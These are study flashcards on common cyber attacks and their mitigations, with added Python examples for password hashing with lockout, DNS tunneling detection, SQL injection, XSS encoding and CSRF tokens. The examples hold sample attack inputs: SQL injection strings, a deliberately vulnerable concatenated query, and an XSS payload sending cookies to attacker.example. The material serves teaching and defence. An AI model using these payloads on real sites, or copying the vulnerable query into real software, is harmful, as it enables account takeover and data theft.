Cyber Attacks 1 Flashcards
What do TTPs stand for?
Tactics, Techniques, and Procedures
What is a brute force attack?
A password-guessing attack that repeatedly tries username and password combinations until one succeeds. Against a live login endpoint it is an online attack and can be slowed down by the server; run against a stolen hash database it is an offline attack, and only the strength of the hashing scheme limits the attacker.
How can brute force attacks be mitigated?
Require strong, non-reused passwords, lock out (or progressively throttle) accounts after a few failed attempts, use CAPTCHA to slow automated guessing, and require multifactor authentication so that a guessed password alone is not enough.
What is a dictionary attack?
A brute force variant that tries a list of likely passwords (dictionary words, common passwords, passwords from earlier breaches) instead of every possible combination. The list can be personalized with target-specific details such as dates, names, pets or numbers gathered during reconnaissance.
How can dictionary attacks be mitigated?
Advise users not to use real words or easily guessed personal details as passwords, check new passwords against lists of known-breached passwords, lock out accounts after repeated failures, use CAPTCHA, and enable multifactor authentication.
What is a common method to enhance password security?
Using complex passwords
What action can be taken to prevent unauthorized access due to multiple incorrect login attempts?
Lockout accounts after a few attempts
How can CAPTCHA help mitigate brute force attacks?
A CAPTCHA adds a challenge that is cheap for a human but costly to automate on every attempt, so a guessing tool is slowed to a crawl. It is a speed bump, not a replacement for lockout or multifactor authentication.
What security measure adds an extra layer of protection by requiring users to provide multiple forms of verification to access an account?
Using multifactor authentication
Cyber Security 3-10 Flashcards
Study
Explain a rainbow table attack
A rainbow table attack is an offline password-cracking technique that uses precomputed tables mapping hashes back to plaintexts. Given a stolen database of unsalted password hashes, the attacker looks each hash up in the table instead of hashing guesses one at a time, so the cost of guessing is paid once, in advance, for every target.
Mitigation for rainbow table attacks
Salt every password with a unique random value before hashing, so that one precomputed table cannot serve all users, and use a deliberately slow password hash (bcrypt, scrypt, Argon2, or PBKDF2 with a high iteration count) so that building tables or guessing is expensive. Account lockout and CAPTCHA do not apply here, because the attack runs offline against hashes the attacker already holds; multifactor authentication limits the damage if a password is recovered.
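As an added worked example (not part of the flashcard deck), the following Python login service ties together the brute force mitigations from the Cyber Attacks 1 deck (lockout after a few failures, constant-time comparison, no timing difference for unknown users) and the rainbow table mitigation above (per-user random salt plus a slow PBKDF2 hash). The in-memory user store, the PBKDF2 iteration count, the lockout thresholds, the wordlist and the 'password123' demonstration are illustrative assumptions, not values from the page.

```python
import hashlib
import hmac
import os
import time
from typing import Callable, Dict, Optional, Tuple

# Illustrative parameters (assumptions for this example, not from the flashcards).
PBKDF2_ITERATIONS = 100_000   # slow hash: tens of milliseconds per guess
MAX_FAILURES = 5              # lock the account after this many consecutive failures
LOCKOUT_SECONDS = 900         # 15-minute lockout


def hash_password(password: str, salt: Optional[bytes] = None) -> Tuple[bytes, bytes]:
    """Return (salt, digest). A fresh random 16-byte salt per user means a
    precomputed table built for unsalted hashes is useless against this store."""
    salt = os.urandom(16) if salt is None else salt
    digest = hashlib.pbkdf2_hmac("sha256", password.encode(), salt, PBKDF2_ITERATIONS)
    return salt, digest


class UserStore:
    """Minimal in-memory user database with lockout; `clock` is injectable for tests."""

    def __init__(self, clock: Callable[[], float] = time.monotonic):
        self.users: Dict[str, dict] = {}
        self.clock = clock

    def register(self, username: str, password: str) -> None:
        salt, digest = hash_password(password)
        self.users[username] = {"salt": salt, "digest": digest,
                                "failures": 0, "locked_until": 0.0}

    def login(self, username: str, password: str) -> str:
        """Return 'ok', 'bad-credentials' or 'locked'."""
        rec = self.users.get(username)
        if rec is None:
            # Hash anyway so an unknown user costs the same time as a wrong password
            # (no username enumeration via response timing).
            hash_password(password, b"\x00" * 16)
            return "bad-credentials"
        now = self.clock()
        if now < rec["locked_until"]:
            return "locked"
        _, digest = hash_password(password, rec["salt"])
        if hmac.compare_digest(digest, rec["digest"]):
            rec["failures"] = 0
            return "ok"
        rec["failures"] += 1
        if rec["failures"] >= MAX_FAILURES:
            rec["locked_until"] = now + LOCKOUT_SECONDS
            rec["failures"] = 0
        return "bad-credentials"


def rainbow_table_demo() -> dict:
    """Why salting defeats precomputation. A tiny 'rainbow table' of unsalted
    SHA-256 hashes recovers the unsalted hash of 'password123' instantly, but two
    salted digests of the same password differ from each other and match nothing
    in the table."""
    guesses = ["letmein", "password123", "qwerty"]        # constructed wordlist
    table = {hashlib.sha256(g.encode()).hexdigest(): g for g in guesses}
    unsalted = hashlib.sha256(b"password123").hexdigest()
    _, d1 = hash_password("password123")
    _, d2 = hash_password("password123")
    return {
        "unsalted_cracked": table.get(unsalted),
        "salted_in_table": d1.hex() in table or d2.hex() in table,
        "salted_digests_differ": d1 != d2,
    }


if __name__ == "__main__":
    store = UserStore()
    store.register("alice", "correct horse battery staple")
    for attempt in ["wrong"] * MAX_FAILURES + ["correct horse battery staple"]:
        print(attempt, "->", store.login("alice", attempt))
    print(rainbow_table_demo())
```

The lockout counter resets on a successful login and when the lockout expires; in production the failure counter should also be keyed by source address, so one attacker cannot lock out a victim on purpose and a distributed attacker cannot spread guesses across many accounts unnoticed.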
What is a pass-the-hash attack?
Pass the hash (PtH) is a technique in which an attacker who has obtained the NTLM hash of a user's password (for example from LSASS memory or the SAM on a compromised Windows host) authenticates to other systems with that hash directly, because NTLM challenge-response proves knowledge of the hash rather than of the password. The attacker never has to crack the hash.
Mitigation for pass-the-hash attacks
Restrict and protect high-privileged domain accounts, restrict and protect local accounts with administrative privileges, and restrict inbound traffic with the Windows Firewall to block lateral movement between workstations. Complementary controls are unique local administrator passwords (LAPS), Credential Guard to keep hashes out of reach of attackers with admin rights, and disabling NTLM where possible.
Why restrict and protect high-privileged domain accounts?
So that privileged credentials are never exposed on higher-risk computers: domain administrators should log on only to dedicated, hardened hosts, since a hash cached on a compromised workstation is all an attacker needs.
Why restrict and protect local accounts with administrative privileges?
So that a local administrator hash stolen from one machine cannot be reused for lateral movement and PtH on others: deny network and remote logon to local accounts and give every machine a unique local administrator password.
Why restrict inbound traffic using the Windows Firewall?
So that a compromised workstation cannot initiate connections (SMB, RDP, WinRM) to peer workstations; blocking inbound connections on workstations removes the paths that lateral movement depends on.
What is scanning?
Scanning is the reconnaissance step in which an attacker probes a target to discover live hosts, open ports, the services and versions behind them, and known vulnerabilities, in order to find exploitable communication channels.
What are the mitigations for scanning activities?
Firewalls and IPS to drop or rate-limit probes and alert on sweeps, OS and service hardening so that only required ports are exposed, and honeypots or canary hosts that carry no legitimate traffic, so any connection to them is a reliable indicator of scanning.
What is a sniffing attack?
Sniffing is the interception of data by capturing network traffic, typically with a packet sniffer such as tcpdump or Wireshark, on a network segment the attacker can see (a hub, an open Wi-Fi network, or a switched LAN after ARP poisoning).
What are the mitigations for sniffing attacks?
Avoid cleartext protocols such as HTTP, FTP and Telnet in favour of HTTPS, SFTP and SSH, encrypt data in transit end to end (TLS, VPN) so that captured traffic is useless, and use switched networks with port security so that frames are not delivered to every host.
What is phishing?
Phishing is a cyber attack that uses disguised email as the weapon: the message impersonates a trusted sender to trick the recipient into clicking a malicious link, opening a harmful attachment, or entering credentials on a fake site. The goal is to steal sensitive information or install malware.
How can phishing be mitigated?
Use an email security gateway that scans links and attachments, train users to recognize and report suspicious mail, and publish email authentication records for your domains: SPF and DKIM, enforced through a DMARC (Domain-based Message Authentication, Reporting and Conformance) policy of quarantine or reject, so that spoofed mail claiming to come from your domain is dropped.
What is spear phishing?
Spear phishing is a phishing attack aimed at a specific individual, organization or business. The attacker personalizes the email with details gathered during reconnaissance (names, projects, suppliers, recent events) so that it looks legitimate to that particular recipient.
What is whaling?
Whaling is spear phishing that targets senior management, leadership teams and other high-value individuals in an organization, typically to authorize fraudulent payments or obtain access to sensitive data.
What are an exploit and a payload?
An exploit is code or a technique that takes advantage of a specific vulnerability to gain a foothold on a system. The payload is what the exploit delivers and runs once it succeeds: the malware that does the damage, such as deleting or encrypting files, stopping services, or opening a remote shell.
What is vishing?
Vishing (voice phishing) works like phishing but over a phone call instead of email: the attacker impersonates a bank, help desk or authority and talks the target into revealing credentials, one-time codes or other sensitive information.
What is spoofing?
Spoofing is forging the identity of a system, sender or address so that people or systems accept something as what it is not. Common forms are IP spoofing (forged source address in packets), MAC address spoofing, email spoofing (forged From header) and DNS spoofing (forged resolution answers).
How can spoofing attacks be mitigated?
The control depends on the type: email spoofing is countered with SPF, DKIM and DMARC; IP spoofing with ingress and egress filtering at the network edge so that packets with impossible source addresses are dropped; MAC and ARP spoofing with switch port security and dynamic ARP inspection; DNS spoofing with DNSSEC and validating resolvers. An IPS and user education add a further layer.
What is a DoS attack?
A Denial of Service (DoS) attack makes a machine or network resource unavailable to its intended users, temporarily or indefinitely, by exhausting bandwidth, connection state or processing capacity. Examples include UDP floods, ICMP floods and SYN floods.
What is a DDoS attack?
A Distributed Denial of Service (DDoS) attack is a DoS attack launched from many systems at once against one target. The attacking systems are usually compromised machines controlled as a botnet, which makes the traffic hard to filter by source.
What is a botnet in the context of DDoS attacks?
A botnet is a set of compromised systems under an attacker's command and control, used together to generate attack traffic.
How can DoS and DDoS attacks be mitigated?
Use anti-DDoS scrubbing technology such as Arbor or a cloud-based mitigation service to absorb volumetric floods, rate-limit connections per source, shorten connection wait times so that half-open connections are released quickly, and deploy load balancers so that capacity can scale.
What is a SYN flood attack?
A SYN flood abuses the TCP three-way handshake: the attacker sends a large number of SYN requests, often from spoofed source addresses, but never sends the final ACK. Each half-open connection occupies an entry in the server's backlog until it times out, so the backlog fills and legitimate clients cannot connect.
How can SYN flood attacks be mitigated?
Enable SYN cookies, so the server encodes connection state in its initial sequence number instead of allocating a backlog entry for every SYN; reduce the SYN-RECEIVED timeout; increase the backlog size; rate-limit SYNs; and use upstream anti-DDoS technology such as Arbor and load balancers that complete the handshake on the server's behalf.
What is ARP poisoning also known as?
ARP spoofing.
What is ARP poisoning?
ARP poisoning is an attack in which the attacker sends forged ARP replies on a local area network so that other hosts associate the attacker's MAC address with the IP address of a legitimate computer or server (typically the default gateway). Because ARP is unauthenticated and hosts cache whatever they receive, the switch then delivers traffic for that IP address to the attacker.
What is the purpose of ARP poisoning?
To mount a Man-in-the-Middle attack: once traffic between two devices passes through the attacker's machine it can be captured, modified or redirected, and every cleartext protocol on the LAN is fully exposed.
How can ARP poisoning be mitigated?
Use static ARP entries for critical hosts such as gateways, enable Dynamic ARP Inspection on managed switches so that ARP replies are checked against DHCP snooping bindings, detect poisoning with tools such as XARP or by alerting on changing IP-to-MAC mappings, filter spoofed ARP traffic, and keep endpoint protection and its signatures up to date. Encrypting traffic end to end (TLS, SSH, VPN) limits what the attacker gains even if poisoning succeeds.
Cyber Security 10-20 Flashcards
What is DNS Tunneling?
DNS tunneling encodes the data of another program or protocol inside DNS queries and responses, typically as subdomain labels of a domain the attacker controls, with the answers carrying data back. Attackers rely on DNS being allowed out through almost every firewall, and use it for command-and-control and data exfiltration that blends into normal traffic.
How can DNS Tunneling attacks be mitigated?
Monitor DNS with an IPS or DNS firewall for the tell-tale patterns (unusually long or high-entropy labels, large numbers of unique subdomains under one domain, heavy use of TXT or NULL records, query volume far above baseline), block resolution of domains known for exfiltration using response policy zones, force all clients through internal resolvers so that direct external DNS is not possible, and consider a dedicated DNS protection product such as Infoblox.
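The detection side of the mitigation card, as an added example that is not from the deck: a small Python detector that runs over resolver log lines and flags the indicators named above (long labels, high Shannon entropy, unusual record types, many unique subdomains under one registered domain). The log lines are constructed for the example, the domain evil-tunnel.net is fictitious, the registered-domain logic is a crude last-two-labels approximation rather than a public suffix list, and every threshold is an assumption to be tuned against your own baseline.

```python
import math
from collections import defaultdict
from typing import Dict, List, Optional

# Constructed sample of resolver log lines (not from a real capture):
# "<time> <client> <qtype> <qname>".
SAMPLE_LOG = """\
10:00:01 10.0.0.5 A www.example.com
10:00:02 10.0.0.5 A mail.example.com
10:00:03 10.0.0.7 TXT 3e4f1a9c8b2d7e6f5a4b3c2d1e0f9a8b.x7.evil-tunnel.net
10:00:03 10.0.0.7 TXT 9b8a7c6d5e4f3a2b1c0d9e8f7a6b5c4d.x7.evil-tunnel.net
10:00:04 10.0.0.7 NULL 4c3b2a1d0e9f8a7b6c5d4e3f2a1b0c9d.x7.evil-tunnel.net
10:00:04 10.0.0.5 AAAA cdn.example.com
10:00:05 10.0.0.7 TXT a1b2c3d4e5f60718293a4b5c6d7e8f90.x7.evil-tunnel.net
10:00:06 10.0.0.9 A www.example.com
"""

# Thresholds are illustrative assumptions; tune them on your own traffic.
MAX_LABEL_LEN = 30            # ordinary hostnames rarely have 30+ character labels
MIN_ENTROPY = 3.5             # bits per character; hex/base32 payloads score high
MAX_UNIQUE_SUBDOMAINS = 3     # per registered domain, within the window observed
SUSPICIOUS_QTYPES = {"TXT", "NULL"}


def shannon_entropy(s: str) -> float:
    """Bits of entropy per character of s (0.0 for empty or single-symbol strings)."""
    if not s:
        return 0.0
    n = len(s)
    counts = {c: s.count(c) for c in set(s)}
    return -sum(c / n * math.log2(c / n) for c in counts.values())


def registered_domain(qname: str) -> str:
    """Crude approximation: the last two labels (no public suffix list)."""
    labels = qname.rstrip(".").split(".")
    return ".".join(labels[-2:])


def parse_line(line: str) -> Optional[dict]:
    parts = line.split()
    if len(parts) != 4:
        return None
    ts, client, qtype, qname = parts
    return {"ts": ts, "client": client, "qtype": qtype.upper(), "qname": qname.lower()}


def score_query(q: dict) -> List[str]:
    """Per-query indicators for one parsed log line."""
    reasons = []
    longest = max(q["qname"].split("."), key=len)
    if len(longest) >= MAX_LABEL_LEN:
        reasons.append("long-label")
    if shannon_entropy(longest) >= MIN_ENTROPY:
        reasons.append("high-entropy")
    if q["qtype"] in SUSPICIOUS_QTYPES:
        reasons.append("unusual-qtype")
    return reasons


def detect_tunnels(log_text: str) -> Dict[str, dict]:
    """Aggregate per registered domain and return only domains that trip at least
    one per-query indicator or the unique-subdomain aggregate indicator."""
    per_domain = defaultdict(lambda: {"reasons": set(), "clients": set(), "subdomains": set()})
    for line in log_text.splitlines():
        q = parse_line(line)
        if q is None:
            continue
        entry = per_domain[registered_domain(q["qname"])]
        entry["subdomains"].add(q["qname"])
        entry["clients"].add(q["client"])
        entry["reasons"].update(score_query(q))
    findings = {}
    for dom, entry in per_domain.items():
        if len(entry["subdomains"]) > MAX_UNIQUE_SUBDOMAINS:
            entry["reasons"].add("many-unique-subdomains")
        if entry["reasons"]:
            findings[dom] = {"reasons": sorted(entry["reasons"]),
                             "clients": sorted(entry["clients"]),
                             "unique_subdomains": len(entry["subdomains"])}
    return findings


if __name__ == "__main__":
    for dom, info in detect_tunnels(SAMPLE_LOG).items():
        print(dom, info)
```

In practice the unique-subdomain count should be measured per time window and compared with a per-domain baseline; CDNs and some legitimate services (anti-virus update checks, certificate transparency lookups) also generate many long, random-looking labels, so the output is a lead for an analyst, not a block decision by itself.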
What is a drive-by download?
A drive-by download is the unintended download and execution of malicious code on a computer or mobile device simply by visiting a web page. The user need not click anything: the page (or an advertisement loaded into it) exploits a vulnerability in the browser, a plugin or other software to trigger the download.
How can drive-by download attacks be mitigated?
Keep browsers, plugins and operating systems patched, since drive-by downloads depend on unpatched vulnerabilities; use antivirus that scans web traffic; deploy web filtering to block known malicious sites; restrict browser add-ons and plugins; block or sandbox advertisements; and teach users to avoid untrusted websites.
What is malware?
Malware is software deliberately created to cause harm to a computer or network. Its activities include deleting or corrupting files, encrypting files for ransom, giving the attacker access to the infected machine, collecting and sending out sensitive data, stopping services, and shutting systems down.
How can you mitigate the impact of malware?
Use antivirus or EDR with up-to-date signatures and behavioral detection, keep systems patched, run users and services with least privilege so that malware inherits limited rights, use ad blockers, keep offline backups so that encrypted or deleted files can be restored, and educate users not to download or run files from unknown sources.
What are the different types of malware?
Viruses, trojans, worms, spyware, ransomware, adware, bots (botnet agents) and remote access trojans (RATs).
What are viruses in the context of malware?
Viruses attach themselves to clean files and, when the infected program runs, infect other clean files. Their aim is to damage a system's core functionality by deleting or corrupting files. They usually arrive as executable files (.exe) and need the user to run them.
What are trojans in the context of malware?
Trojans disguise themselves as legitimate software but carry malicious intent. They act discreetly and typically create backdoors that let the attacker, or other malware, in.
What are worms in the context of malware?
Worms infect entire networks of devices, locally or across the internet, by exploiting network services or shares, and use each newly infected machine to spread further without any user action.
What is spyware in the context of malware?
Spyware is malware designed to spy on users. It hides in the background and records online activity, including passwords, credit card numbers and browsing history, and sends it to the attacker.
What is Ransomware?
Ransomware encrypts files (and often whole systems) and demands payment, usually in cryptocurrency, for the decryption key; many variants also steal data first and threaten to leak it if the ransom is not paid.
What is Adware?
Adware is aggressive advertising software that serves unwanted advertisements, consumes system resources, and can undermine security by acting as a channel for other malware.
What are Botnets?
Botnets are networks of infected computers (bots) controlled by an attacker through a command-and-control channel and made to work together, for example to send spam or launch DDoS attacks.
What is a RAT (Remote Access Trojan)?
A RAT is malware that gives an attacker unauthorized remote control of a victim's machine: running commands, transferring files, capturing the screen or keystrokes.
Difference between Virus, Trojan and Worm - Virus
Viruses attach themselves to clean files and infect other clean files. User action (running the infected program) is required for the virus to execute.
Difference between Virus, Trojan and Worm - Trojans
Trojans appear as useful programs but have malicious intentions. The disguise is what tricks the user into performing the action the malware needs, typically executing it.
Difference between Virus, Trojan and Worm - Worms
Worms spread across the network without user action. Propagation channels include attached external storage, open network shares, and email, where a worm can automatically send a copy of itself to every address in the address book.
What is fileless malware or a fileless attack?
Fileless malware gets in without using a traditional executable file as the first stage of the attack. It hides in memory or in hard-to-inspect locations such as the registry or WMI subscriptions, and leverages trusted, legitimate processes already on the operating system (PowerShell, WMI, mshta, rundll32) to carry out malicious activity, a style known as living off the land.
How does fileless malware differ from traditional malware in terms of detection?
Fileless malware runs in RAM and leaves little or nothing on disk, so traditional antivirus that depends on scanning files against signatures has nothing to match.
What are some mitigation strategies for dealing with fileless malware?
Use EDR tools that monitor process behavior, command lines and memory rather than only files; constrain PowerShell and Windows Management Instrumentation where they are not needed (application control, Constrained Language Mode, script block logging and AMSI integration) rather than relying on disabling them outright, since administrators depend on both; and patch the Office and browser vulnerabilities that commonly serve as the initial entry point.
What is OWASP and its purpose?
OWASP (the Open Web Application Security Project) is an online community that produces articles, methodologies, documentation, tools and technologies for web application security. It publishes the OWASP Top 10, a list of the most critical web application security risks, which is revised every few years (2013, 2017, 2021) rather than annually.
What are the OWASP Top 10 web application vulnerabilities (2017 edition, current as of 2019)?
1. Injection 2. Broken Authentication 3. Sensitive Data Exposure 4. XML External Entities (XXE) 5. Broken Access Control 6. Security Misconfiguration 7. Cross-Site Scripting (XSS) 8. Insecure Deserialization 9. Using Components with Known Vulnerabilities 10. Insufficient Logging and Monitoring
Explain SQL Injection.
SQL injection is a code injection technique in which attacker-controlled input is placed into a SQL statement that the application builds by string concatenation, so the input is parsed as SQL rather than treated as data. Because that statement runs against the database behind the web application, the attacker can bypass authentication, read, copy, modify or delete data, and in some configurations execute commands on the database server.
What are the mitigation techniques for SQL Injection?
1. Use parameterized queries (prepared statements), or an ORM that generates them, so that input is bound as a value and never parsed as SQL; this is the primary control. 2. Validate input against an allowlist of expected formats; stripping quotes and special characters is not a reliable defense on its own. 3. Run the application with a least-privilege database account. 4. Use IPS and WAF solutions as a secondary layer. 5. Turn off display of database errors on production servers so that failed injections do not leak schema details.
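The difference between the concatenated and the parameterized query, as an added example written for this page (it is not code from the deck and also illustrates the SQL injection cards in the Cyber Security 21-28 deck). It uses Python's built-in sqlite3 module with an in-memory database; the `users` table, its two rows and the placeholder "hash" strings are constructed for the demonstration.

```python
import sqlite3

# Constructed schema and rows (assumptions for the demo); in a real system the
# password column would hold salted, slow hashes, and the strings here only
# stand in for them.
def make_db() -> sqlite3.Connection:
    conn = sqlite3.connect(":memory:")
    conn.execute(
        "CREATE TABLE users (id INTEGER PRIMARY KEY, username TEXT, password_hash TEXT)"
    )
    conn.executemany(
        "INSERT INTO users (username, password_hash) VALUES (?, ?)",
        [("alice", "hash-a"), ("bob", "hash-b")],
    )
    conn.commit()
    return conn


def login_vulnerable(conn: sqlite3.Connection, username: str, password_hash: str) -> bool:
    """Deliberately vulnerable: user input is concatenated into the SQL text,
    so quotes and comment markers in the input become part of the statement."""
    sql = ("SELECT id FROM users WHERE username = '" + username +
           "' AND password_hash = '" + password_hash + "'")
    return conn.execute(sql).fetchone() is not None


def login_parameterized(conn: sqlite3.Connection, username: str, password_hash: str) -> bool:
    """Fixed: '?' placeholders send the values separately from the statement,
    so the database compares them as data and never parses them as SQL."""
    sql = "SELECT id FROM users WHERE username = ? AND password_hash = ?"
    return conn.execute(sql, (username, password_hash)).fetchone() is not None


def demo() -> dict:
    """Run the same two classic inputs through both implementations."""
    conn = make_db()
    tautology = "' OR '1'='1"      # turns the WHERE clause into ... OR '1'='1'
    comment = "alice'--"           # closes the quote and comments out the password check
    return {
        "vuln_legit": login_vulnerable(conn, "alice", "hash-a"),
        "vuln_tautology": login_vulnerable(conn, "alice", tautology),
        "vuln_comment": login_vulnerable(conn, comment, "anything"),
        "param_legit": login_parameterized(conn, "alice", "hash-a"),
        "param_tautology": login_parameterized(conn, "alice", tautology),
        "param_comment": login_parameterized(conn, comment, "anything"),
    }


if __name__ == "__main__":
    for name, ok in demo().items():
        print(f"{name:16s} -> {'logged in' if ok else 'rejected'}")
```

Note that the parameterized version needs no quote stripping at all: the attacker's quotes and `--` arrive at the database as an ordinary string value that matches no row, which is exactly why prepared statements rather than input sanitization are the primary control.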
Explain Cross-Site Scripting (XSS).
Cross-Site Scripting (XSS) is a client-side code injection attack: the attacker gets malicious script into a legitimate web page so that it executes in the victim's browser with that site's origin, where it can steal session cookies, perform actions as the user, or deface the page. Reflected XSS echoes the script back from a crafted URL; stored XSS saves it server-side so that every visitor is hit.
Where does Cross Site Scripting (XSS) usually occur?
Wherever user-supplied text is written back into a page: most obviously free-text fields such as blog comments, but also search boxes, profile names and URL parameters reflected into the page.
How can Cross Site Scripting (XSS) be mitigated?
Encode data on output for the context it is inserted into (HTML body, attribute, JavaScript, URL); this is the primary control. Validate input against expected formats, deploy a Content Security Policy to limit which scripts can run, and mark session cookies HttpOnly so that script cannot read them. Stripping quotes and special characters from input is fragile and corrupts legitimate data; it is no substitute for contextual output encoding.
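Contextual output encoding in practice, as an added example that is not from the deck (it also illustrates the XSS cards in the Cyber Security 21-28 deck). The Python below renders a stored comment unsafely and then safely for each of the four contexts named above using only the standard library, and contrasts that with the deck's "remove quotes and special characters" advice. The comment strings are constructed for the example; the `attacker.example` host in the payload is a reserved example domain, not a real site.

```python
import html
import json
from urllib.parse import quote

# Constructed inputs: one hostile comment, one harmless comment that happens to
# contain the same special characters.
MALICIOUS_COMMENT = '<script>fetch("https://attacker.example/?c=" + document.cookie)</script>'
TRICKY_COMMENT = 'Nice "post" -- 5 < 6 & 7 > 3'


def render_vulnerable(comment: str) -> str:
    """Deliberately vulnerable: raw user text is interpolated into HTML."""
    return '<div class="comment">' + comment + "</div>"


def render_safe(comment: str) -> str:
    """HTML body context: html.escape turns < > & " ' into entities, so the
    browser displays the text instead of parsing it as markup."""
    return '<div class="comment">' + html.escape(comment, quote=True) + "</div>"


def render_attr_safe(value: str) -> str:
    """Attribute context: escape AND always quote the attribute, otherwise a
    space in the value starts a new attribute such as onmouseover."""
    return '<input name="q" value="' + html.escape(value, quote=True) + '">'


def render_js_safe(value: str) -> str:
    """JavaScript context: JSON-encode the value and also escape '</' so that a
    '</script>' inside the string cannot terminate the script block early."""
    return "<script>var comment = " + json.dumps(value).replace("</", "<\\/") + ";</script>"


def render_url_safe(value: str) -> str:
    """URL query context: percent-encode the component."""
    return '<a href="/search?q=' + quote(value, safe="") + '">search</a>'


def strip_special_chars(comment: str) -> str:
    """The 'remove quotes and special characters' approach from the flashcards,
    included only for contrast: it silently mangles legitimate text."""
    return "".join(c for c in comment if c not in "<>\"'&")


if __name__ == "__main__":
    print(render_vulnerable(MALICIOUS_COMMENT))
    print(render_safe(MALICIOUS_COMMENT))
    print(render_safe(TRICKY_COMMENT))
    print(strip_special_chars(TRICKY_COMMENT))
    print(render_attr_safe('" onmouseover="alert(1)'))
    print(render_js_safe('</script><script>alert(1)</script>'))
    print(render_url_safe("a b&c=d"))
```

Template engines such as Jinja2 with autoescaping do the HTML-body encoding for you, but attribute, JavaScript and URL contexts still need the matching encoder, and the user's text survives unchanged in every case, which is the point of encoding at output time rather than stripping at input time.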
Cyber Security 21-28 Flashcards
Difference between Virus and Trojan
Virus: attaches itself to clean files and infects other clean files; requires user action, such as executing the infected program, to run. Trojan: appears to be a useful program but has malicious intent; the disguise is used to trick the user into performing the action it needs, such as executing it.
Difference between Trojan and Worm
Trojan: appears to be a useful program but has malicious intent, and relies on the user to run it. Worm: spreads across the network without user action, via attached external storage, open network shares, and email, where it can automatically send a copy of itself to everyone in the address book.
What is fileless malware or a fileless attack?
Fileless malware gets in without using a traditional executable file as the first stage of the attack. It hides in memory or other hard-to-inspect locations and uses living-off-the-land techniques, leveraging trusted, legitimate processes already running on the operating system (such as PowerShell or WMI) to perform malicious activity. Because it runs from RAM and leaves little or no trace on disk, traditional antivirus that relies on file signatures has trouble detecting it.
How can fileless malware be mitigated?
Use EDR tools that monitor process behavior and memory to detect suspicious activity, and constrain command-line scripting environments such as PowerShell and Windows Management Instrumentation where they are not needed (application control, Constrained Language Mode, script logging), rather than expecting to disable them outright, since administration depends on them.
What is OWASP?
OWASP stands for the Open Web Application Security Project. It is an online community that produces articles, methodologies, documentation, tools and technologies in the field of web application security.
What is OWASP's Top 10 list?
The OWASP Top 10 is OWASP's list of the most critical web application security risks, revised every few years rather than annually. The edition current as of 2019 (published in 2017) lists Injection, Broken Authentication, Sensitive Data Exposure, XML External Entities (XXE), Broken Access Control, Security Misconfiguration, Cross-Site Scripting (XSS), Insecure Deserialization, Using Components with Known Vulnerabilities, and Insufficient Logging and Monitoring.
What is SQL injection?
SQL injection is a code injection technique in which malicious SQL supplied through an input field ends up inside a statement the application builds by string concatenation, so it is executed by the database behind the web application. Attackers use it to bypass authentication and to read, copy, modify or delete data.
How can SQL Injection be mitigated?
Use parameterized queries or prepared statements so that input is always bound as data, validate input against an allowlist (stripping quotes and special characters alone is not reliable), run with a least-privilege database account, use IPS and WAF solutions as a secondary layer, and turn off display of database errors on production servers.
What is Cross Site Scripting (XSS)?
Cross Site Scripting (XSS) is a client-side code injection attack in which an attacker gets malicious script into a legitimate web page, either reflected from a crafted request or stored by the application, so that it runs in other users' browsers with the site's privileges.
How can XSS be mitigated?
Encode data on output for the context it lands in (HTML, attribute, JavaScript, URL), validate input, use a Content Security Policy, and set HttpOnly on session cookies. Removing quotes and special characters from input is not a reliable control on its own.
What is Cross Site Request Forgery (CSRF)?
Cross Site Request Forgery (CSRF) is an attack that forces an authenticated user's browser to send a state-changing request (a transfer, a password change, a purchase) to a web application without the user's knowledge. It works because the browser automatically attaches the session cookie to any request to that site, including one triggered by a form or image on the attacker's page.
How can Cross Site Request Forgery (CSRF) be mitigated?
Use the synchronizer token pattern (a secret per-session token embedded in each form and verified server-side), require a custom request header that a cross-site form cannot set, or use the double-submit cookie pattern (the same token in a cookie and in the request body). Setting the SameSite attribute on session cookies stops the browser attaching them to cross-site requests in the first place.
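The two token patterns from the mitigation card, as an added example that is not code from the deck: a Python simulation of a POST /transfer handler that enforces a synchronizer token, plus an HMAC-based double-submit token that needs no server-side state. The session store, the request dictionaries standing in for HTTP requests, the server key and the `/transfer` endpoint are all constructed assumptions for the demonstration.

```python
import hashlib
import hmac
import secrets
from typing import Dict, Optional

# Server-side signing key; in production this comes from configuration (assumption).
SERVER_KEY = secrets.token_bytes(32)


def issue_synchronizer_token(session_store: Dict[str, dict], session_id: str) -> str:
    """Synchronizer token pattern: a random token stored server-side per session
    and embedded as a hidden field in every state-changing form."""
    token = secrets.token_urlsafe(32)
    session_store.setdefault(session_id, {})["csrf_token"] = token
    return token


def verify_synchronizer_token(session_store: Dict[str, dict], session_id: str,
                              submitted: Optional[str]) -> bool:
    expected = session_store.get(session_id, {}).get("csrf_token")
    if expected is None or submitted is None:
        return False
    return hmac.compare_digest(expected, submitted)   # constant-time comparison


def issue_double_submit_token(session_id: str) -> str:
    """Double-submit cookie pattern (signed variant): the token is an HMAC of the
    session id, so the server keeps no state. It is set as a cookie and must also
    be sent back in the form or a header; an attacker's cross-site page cannot
    read the cookie, so it cannot supply a matching copy."""
    return hmac.new(SERVER_KEY, session_id.encode(), hashlib.sha256).hexdigest()


def verify_double_submit(session_id: str, cookie_token: Optional[str],
                         form_token: Optional[str]) -> bool:
    if cookie_token is None or form_token is None:
        return False
    expected = issue_double_submit_token(session_id)
    return (hmac.compare_digest(cookie_token, form_token)
            and hmac.compare_digest(cookie_token, expected))


def handle_transfer(request: dict, session_store: Dict[str, dict]) -> str:
    """Simulated POST /transfer. `request` is a constructed dict with 'cookies'
    and 'form' keys; the return value stands in for the HTTP status line."""
    session_id = request["cookies"].get("session")
    if session_id is None or session_id not in session_store:
        return "401 Unauthorized"
    if not verify_synchronizer_token(session_store, session_id, request["form"].get("csrf_token")):
        return "403 Forbidden (CSRF token missing or invalid)"
    return "200 OK transferred %s" % request["form"].get("amount")


if __name__ == "__main__":
    store: Dict[str, dict] = {}
    token = issue_synchronizer_token(store, "sess-abc")
    # The victim's own form carries the token; the attacker's auto-submitting
    # form gets the session cookie attached by the browser but cannot know the token.
    legit = {"cookies": {"session": "sess-abc"}, "form": {"csrf_token": token, "amount": "100"}}
    forged = {"cookies": {"session": "sess-abc"}, "form": {"amount": "100"}}
    print(handle_transfer(legit, store))
    print(handle_transfer(forged, store))
```

Both checks compare with `hmac.compare_digest` so that a token cannot be recovered byte by byte through timing, and both must be applied only to state-changing methods; GET requests that change state are themselves a CSRF bug no token can fix.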
What is a Broken Authentication vulnerability?
Broken Authentication covers weaknesses that let an attacker capture or bypass the authentication mechanism of a web application, for example by guessing passwords without limit, replaying stolen credentials, or stealing session identifiers, and so gain access as another user.
What types of attacks can Broken Authentication vulnerabilities lead to?
